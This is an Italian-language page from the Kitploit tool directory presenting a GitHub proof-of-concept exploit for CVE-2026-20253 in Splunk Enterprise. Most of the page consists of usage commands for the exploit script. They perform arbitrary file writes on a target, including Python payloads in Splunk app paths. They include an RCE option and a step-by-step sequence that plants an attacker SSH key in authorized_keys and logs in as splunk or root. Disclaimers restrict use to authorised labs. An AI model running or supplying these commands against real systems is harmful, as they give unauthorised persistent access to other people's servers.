Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20253 — CVE-2026-20253 - Splunk Enterprise | Kitploit
Strumenti/GitHubGitHub/horkimhab/cve-2026-20253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 - Splunk Enterprise

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-20253 - Splunk Enterprise

⚡ Utilizzo Semplice

Utilizza questo progetto solo in ambienti sicuri e autorizzati, come:

  • Macchine virtuali locali
  • Contenitori Docker
  • Configurazioni di laboratorio isolate
  • Ambienti di test di penetrazione autorizzati

Setup di esempio:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirements
pip install -r requirements.txt

Esempio di utilizzo:

root@kitploit:~
# Basic check
python3 cve-2026-20253.py -t http://target:8000 --check

# Write empty/truncated file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"

# Write with content from file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt

# Advanced (restore + content)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore

# RCE attempt
python3 cve-2026-20253.py -t http://target:8000 --rce

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/path/to/target/file.py" \
  --content poc-content.txt --restore


# SSH 

# Generate SSH key pair (if you don't have one)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""

# Or use RSA if target is older
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""

cat ~/.ssh/splunk_poc_key.pub > poc-content.txt

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt \
  --restore

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt

# Make sure permissions are correct on your side
chmod 600 ~/.ssh/splunk_poc_key

# Connect
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip

# Or as root
ssh -i ~/.ssh/splunk_poc_key root@target_ip


# Step 1: Create directory (may not always work)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"

# Step 2: Write authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt

mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh

Crediti o Riferimenti

  • https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
  • watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253

📚 Repository Educativo di Ricerca sulla Sicurezza

Un repository per apprendere, testare e ricercare concetti di cybersicurezza in ambienti controllati.


⚠️ Disclaimer sulla Sicurezza e Legale

Scopo

Questo repository è esclusivamente per ricerca sulla sicurezza educativa e autorizzata.

È progettato per aiutare gli utenti a conoscere:

  • Vulnerabilità di sicurezza
  • Concetti di sandbox e isolamento
  • Pratiche di codifica sicura e difensive

Solo Uso Autorizzato

Utilizza questo repository solo in ambienti in cui hai il permesso, come:

  • Laboratori personali o macchine virtuali
  • Ambienti Docker o isolati
  • Test di penetrazione autorizzati
  • Formazione sulla cybersicurezza o ricerca accademica

L'uso non autorizzato o illegale è severamente vietato.


Nessuna Responsabilità

L'autore e i collaboratori non sono responsabili di danni, usi impropri, problemi legali o perdite causati da questo progetto.

Utilizzando questo repository, accetti che:

  • Sei responsabile delle tue azioni
  • Lo utilizzerai in modo legale ed etico
  • Il progetto è fornito senza garanzia

Uso Etico

Questo progetto è pensato per:

  • Ricerca sulla sicurezza difensiva
  • Educazione alla cybersicurezza
  • Consapevolezza delle vulnerabilità
  • Ricerca su sistemi e software sicuri

Si prega di seguire le pratiche di responsible disclosure e di rispettare tutte le leggi applicabili.


Contatti

Per responsible disclosure o collaborazioni, contatta il manutentore del repository tramite GitHub.

Scarica lo strumento